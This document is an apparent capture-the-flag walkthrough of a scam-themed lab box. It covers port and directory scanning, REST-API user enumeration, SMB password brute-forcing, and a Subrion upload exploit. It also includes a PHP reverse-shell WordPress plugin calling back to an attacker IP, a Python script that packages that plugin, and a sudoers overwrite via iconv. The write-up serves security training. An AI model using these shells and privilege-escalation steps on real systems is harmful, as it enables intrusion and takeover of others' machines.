Rustscan
rustscan -a 10.10.75.149
Output:
22/tcp open ssh syn-ack
80/tcp open http syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
gobuster
gobuster dir -u http://10.10.75.149/ -w /usr/share/wordlists/dirb/common.txt -x txt,php,html
Output:
/phpinfo.php (Status: 200) [Size: 94928]
/server-status (Status: 403) [Size: 277]
/test (Status: 301) [Size: 311] [--> http://10.10.75.149/test/]
/wordpress (Status: 301) [Size: 316] [--> http://10.10.75.149/wordpress/]
Two websites are present:
- /wordpress (a WordPress site)
- /test (the scam page)
wpscan
wpscan --url http://10.10.75.149/wordpress/ --enumerate u
Output:
[+] WordPress version 5.7.2 identified (Insecure, released on 2021-05-12).
...
[+] WordPress theme in use: teczilla
[!] The version is out of date, the latest version is 1.1.4
...
[+] support
...
http://10.10.75.149/wordpress/index.php/index.php/wp-json/wp/v2/users/?per_page=100&page=1
...
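wpscan reports the user support because the WordPress REST API lists it at the wp-json/wp/v2/users URL above: every user who has published a post is exposed there, and the slug field is derived from the login name. The following is an added example, not part of the original writeup, that reproduces that enumeration in Python: it parses the users endpoint, walks the per_page/page pagination wpscan uses, and stops when WordPress answers with an error object instead of a list. The JSON responses, the fake_fetch helper and the function names are constructed for the example; http_get is the live fetcher.

```python
import json
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, List

# Constructed sample responses (not captured from the target), shaped like
# what WordPress returns from /wp-json/wp/v2/users: a list of user objects,
# or an error object once the page number runs past the last page.
SAMPLE_PAGE_1 = json.dumps([
    {"id": 1, "name": "support", "slug": "support",
     "link": "http://10.10.75.149/wordpress/index.php/author/support/"},
])
SAMPLE_PAST_END = json.dumps({
    "code": "rest_post_invalid_page_number",
    "message": "The page number requested is larger than the number of pages available.",
    "data": {"status": 400},
})


def usernames_from_users_endpoint(body: str) -> List[str]:
    """Pull login-name candidates out of one wp/v2/users response.

    The 'slug' of a user is derived from the login name (lowercased), which is
    why wpscan reports it as a username; 'name' is only the display name.
    Anything that is not a list (an error object, e.g. when a hardening
    plugin blocks the endpoint) yields no names.
    """
    data = json.loads(body)
    if not isinstance(data, list):
        return []
    return [u["slug"] for u in data if isinstance(u, dict) and "slug" in u]


def enumerate_users(base_url: str, fetch: Callable[[str], str],
                    per_page: int = 100) -> List[str]:
    """Walk the users endpoint page by page until it stops returning users.

    'fetch' is injected so the loop can be exercised offline; pass http_get
    for a live target.
    """
    found: List[str] = []
    page = 1
    while True:
        url = (f"{base_url.rstrip('/')}/wp-json/wp/v2/users/"
               f"?per_page={per_page}&page={page}")
        names = usernames_from_users_endpoint(fetch(url))
        if not names:
            break
        found.extend(names)
        page += 1
    return found


def http_get(url: str, timeout: float = 10) -> str:
    """GET a URL and return the body even on 4xx, because WordPress sends
    its error JSON with a 400/401 status and urlopen raises on those."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


def fake_fetch(url: str) -> str:
    """Offline stand-in for http_get serving the constructed pages above."""
    query = urllib.parse.parse_qs(urllib.parse.urlparse(url).query)
    return SAMPLE_PAGE_1 if query.get("page") == ["1"] else SAMPLE_PAST_END


if __name__ == "__main__":
    # Offline run; swap fake_fetch for http_get against a real target.
    print(enumerate_users("http://10.10.75.149/wordpress/", fake_fetch))
```

The injected fetcher is what makes the pagination loop testable without a target; against a live site the same loop with http_get returns every slug the API will hand out, which is the list to feed into the SMB password attack below.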
smb
crackmapexec smb 10.10.75.149 -u support -p /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt
Output:
support:123456
smbmap -H 10.10.75.149 -R -u "support" -p "123456"
Output:
[+] IP: 10.10.75.149:445    Name: 10.10.75.149    Status: Guest session
    Disk        Permissions    Comment
    ----        -----------    -------
    print$      NO ACCESS      Printer Drivers
    websvr      READ ONLY
    .\websvr\*
    dr--r--r--      0 Sat May 29 09:17:38 2021    .
    dr--r--r--      0 Sat May 29 09:03:47 2021    ..
    fr--r--r--    273 Sat May 29 09:17:38 2021    enter.txt
    IPC$        NO ACCESS      IPC Service (TechSupport server (Samba, Ubuntu))
smbclient //10.10.75.149/websvr -U "support"
Password for [WORKGROUP\support]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat May 29 09:17:38 2021
  ..                                  D        0  Sat May 29 09:03:47 2021
  enter.txt                           N      273  Sat May 29 09:17:38 2021

                8460484 blocks of size 1024. 5695980 blocks available
smb: \> cat enter.txt
cat: command not found
smb: \> more enter.txt
getting file \enter.txt of size 273 as /tmp/smbmore.KPey6E (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
(smbclient has no cat; more downloads the file to a temp path and pages it, get enter.txt would keep a local copy.) Contents of enter.txt:
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website
IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->
The "cooked" value is not a hash but an encoded password: "cooked with magical formula" points at CyberChef (recipes there are cooked, and the Magic operation guesses the encoding chain). Running Magic on 7sKvntXdPEJaxazce9PXi24zaFrLiKWCk recovers the Subrion admin password:
Scam2021
Subrion is a CMS; the goals file says it lives under /subrion and is administered from its panel. There is a public exploit for it (an authenticated arbitrary file upload):
https://www.exploit-db.com/exploits/49876
shell
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri http://target/panel")
The -u option expects the panel URL, so for this box it is http://10.10.75.149/subrion/panel, and the exploit logs in with the recovered creds (admin:Scam2021) before uploading its payload.
This reverse shell doesn't smell good…
cat /etc/passwd
scamsite:x:1000:1000:scammer,,,:/home/scamsite:/bin/bash
cat /var/www/*/w*/*config*
This glob picks up the WordPress wp-config.php, which stores the DB_USER/DB_PASSWORD values in clear text:
WordPress creds:
user: support
password: ImAScammerLOL!123!
wordpress revershell
wp_plugin_rv.php (the header comment is what makes WordPress recognise the file as a plugin):
<?php
/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: Vince Matteo
* Author URI: http://peanutstick.githubio.com
*/
// Runs as the web server user as soon as WordPress includes the plugin
// file (on activation): interactive bash pushed to the attacker's listener.
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.8.50.167/4949 0>&1'");
?>
Start the listener first:
nc -lnvp 4949
Upload it: zip the plugin file, log into /wordpress/wp-admin as support, upload the zip via Plugins > Add New > Upload Plugin, then activate it. Activation includes the plugin file, so the exec() fires and the shell lands on the listener.
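The packaging step is where this usually goes wrong: Upload Plugin wants a zip, and WordPress only treats a PHP file as a plugin if a Plugin Name: header appears in its first 8 KiB. The following is an added example, not part of the original writeup, that builds the archive in the layout the uploader expects (a top-level directory holding the PHP file) and refuses to package a file that WordPress would silently ignore. The slug, function names and the header regex (an approximation of the pattern WordPress's get_file_data() uses) are this example's own; the PHP source is the page's plugin with the attacker IP and port it uses.

```python
import io
import re
import zipfile
from typing import List, Optional

# The plugin source from the page, with the listener IP/port it uses.
PLUGIN_PHP = """<?php
/**
 * Plugin Name: Reverse Shell Plugin
 * Description: Reverse Shell Plugin
 * Version: 1.0
 */
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.8.50.167/4949 0>&1'");
?>
"""

# WordPress scans the first 8 KiB of each PHP file under wp-content/plugins
# for this header line; without it the file is never listed as a plugin and
# so can never be activated. Approximates WordPress's own get_file_data().
PLUGIN_NAME_RE = re.compile(r"^[ \t/*#@]*Plugin Name:(.*)$", re.M | re.I)


def plugin_name(php_source: str) -> Optional[str]:
    """Return the declared plugin name, or None if the header is missing."""
    m = PLUGIN_NAME_RE.search(php_source[:8192])
    return m.group(1).strip() if m else None


def build_plugin_zip(slug: str, php_source: str) -> bytes:
    """Package the plugin as <slug>/<slug>.php inside a zip archive.

    Upload Plugin unpacks the archive into wp-content/plugins/, so a top-level
    directory keeps the file at plugins/<slug>/<slug>.php and gives the plugin
    a stable identifier (slug/slug.php) for activation.
    """
    if plugin_name(php_source) is None:
        raise ValueError("no 'Plugin Name:' header; WordPress would not list this plugin")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{slug}/{slug}.php", php_source)
    return buf.getvalue()


def zip_members(data: bytes) -> List[str]:
    """List the archive's entries (sanity check of the layout before upload)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


if __name__ == "__main__":
    archive = build_plugin_zip("wp_plugin_rv", PLUGIN_PHP)
    with open("wp_plugin_rv.zip", "wb") as f:
        f.write(archive)
    print(zip_members(archive))
```

Running the script writes wp_plugin_rv.zip next to it; that file is what goes into the Upload Plugin form, and the plugin then appears as "Reverse Shell Plugin" on the Plugins page, ready to be activated with the listener already running.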
ssh
ssh scamsite@10.10.75.149
Log in with the last password found, ImAScammerLOL!123!, which the scamsite account reuses.
sudo -l
...
(ALL) NOPASSWD: /usr/bin/iconv
https://gtfobins.github.io/gtfobins/iconv/
privesc
The GTFOBins iconv entry writes arbitrary data to a file as root; $LFILE must be set to the target path first. Note that -o truncates the output file, so this replaces /etc/sudoers with that single line: the NOPASSWD iconv rule is gone afterwards and the next sudo asks for scamsite's password, which is known. Writing to a new file such as /etc/sudoers.d/scamsite instead is less destructive where sudoers still includes that directory.
LFILE=/etc/sudoers
echo "scamsite ALL=(ALL:ALL) ALL" | sudo iconv -f 8859_1 -t 8859_1 -o "$LFILE"
sudo su